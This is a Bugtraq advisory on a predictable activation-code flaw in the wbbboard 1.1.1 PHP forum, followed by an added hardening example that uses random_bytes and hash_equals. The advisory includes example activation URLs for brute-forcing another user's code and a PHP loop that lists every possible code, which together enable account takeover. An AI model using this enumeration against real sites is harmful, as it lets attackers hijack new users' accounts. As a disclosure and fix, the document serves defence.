Bugtraq mailing list archives


wbbboard 1.1.1 registration _new_users_vulnerability_


From: SeazoN <seazon () dnestr com>
Date: Sun, 26 May 2002 17:11:17 +0300

wbbboard 1.1.1 registration _new_users_vulnerability_
--------------------------------------------------
wbbboard  : i can't find any contact info in credits :(
            i sent a message to wbbhacks.de and mywbb.de
            (support forums), they didn't reply for 3
            days (i think enough)

Affected program         : wbbboard 1.1.1
Vendor                   : http://www.woltlab.de/
Vulnerability-Class      : security bug
OS specific              : No
Remote                   : Yes
Problem-Skill            : High for users waiting for registration activation
                           None for activated users

SUMMARY

wbboard is php & mysql based forum.
Here some code (register.php)
---------------------------
$datum = date("s");
mt_srand($datum);
$z = mt_rand();
$db_zugriff->query("INSERT INTO bb".$n."_user_table
(username,userpassword,useremail,regemail,groupid,regdate,lastvisit,lastactivity,activation)
VALUES
('$name','$password','$email','$email','$default_group','$time','$time','$time',$z)");
---------------------------
after that script mail to user () mail dom with url for activation
here some code from action.php
---------------------------
if($action=="activation") {
        $result = activat($userid,$code);
        if($result == 1) eval ("\$output = \"".gettemplate("error1")."\";");
        if($result == 2) eval ("\$output = \"".gettemplate("error22")."\";");
        if($result == 3) eval ("\$output = \"".gettemplate("error23")."\";");
        if(!$result) {
                $user_id = $userid;
                eval ("\$output = \"".gettemplate("note21")."\";");
                $user_password = getUserPW($userid);
                session_register("user_id");
                session_register("user_password");
                setcookie("user_id", "$user_id", time()+(3600*24*365));
                setcookie("user_password", "$user_password", time()+(3600*24*365));
        }
        $ride = "main.php?styleid=$styleid$session";
}

IMPACT

You can steal NEW user account with his passwords.

EXPLOIT

Register in forum you will receive a message like this:

To continue registration
http://forum.dom/forum/action.php?action=activation&userid=345&code=1563109322

Now You Know how many users on forum and can hijack users with userid=346
(for example)

 HEART OF EXPLOIT
----------------------
| $datum = date("s");|
| mt_srand($datum);  |  this code result only 30 original integer words :)
| $z = mt_rand();    |  i think it is not so hard to bruteforce
----------------------

http://forum.dom/forum/action.php?action=activation&userid=346&code=1898087491
http://forum.dom/forum/action.php?action=activation&userid=346&code=1309289693
....
http://forum.dom/forum/action.php?action=activation&userid=346&code=356268007

You can get all variations with this script

<?php
for($i=0; $i<60; $i++)
{
mt_srand($i);
echo mt_rand()."<BR>";
//   ^^^^^^^^^ here you are :)
}
?>

SOLUTION:
   use simple rand() or really unpredictable md5(uniqid(rand(),1))
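
The weakness described in the post, seen from the fix side, as an added example that is not part of the original post or of WBB: it counts how many activation codes the `date("s")` seeding can ever produce, then issues and checks a token with PHP's `random_bytes()` and `hash_equals()` instead of the generators named in the post. The function names and the choice to store only a SHA-256 hash of the token are assumptions.

```php
<?php
// Added example, not WBB code. All function names here are hypothetical.

// Weak scheme from register.php: the seed is date("s"), i.e. "00".."59".
// Counting the distinct codes it can emit shows how small the code space is.
function weak_code_space(): int
{
    $codes = [];
    for ($s = 0; $s < 60; $s++) {
        mt_srand($s);
        $codes[mt_rand()] = true;
    }
    return count($codes);
}

// Hardened issue step: 128 bits from the OS CSPRNG. The raw token goes into
// the activation mail; only its SHA-256 hash is kept in the activation column
// (assumption: the column can hold a 64-character string).
function issue_activation_token(): array
{
    $token = bin2hex(random_bytes(16));
    return ['token' => $token, 'stored_hash' => hash('sha256', $token)];
}

// Hardened check step: reject malformed input early, then compare the hashes
// in constant time so the comparison leaks nothing about the stored value.
function verify_activation_token(string $supplied, string $storedHash): bool
{
    if (strlen($supplied) !== 32 || !ctype_xdigit($supplied)) {
        return false;
    }
    return hash_equals($storedHash, hash('sha256', $supplied));
}

// Constructed demo run.
$issued = issue_activation_token();
printf("weak scheme: at most %d possible codes\n", weak_code_space());
printf("hardened token: %s\n", $issued['token']);
var_dump(verify_activation_token($issued['token'], $issued['stored_hash'])); // token from the mail
var_dump(verify_activation_token('1563109322', $issued['stored_hash']));     // numeric code in the old format
```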
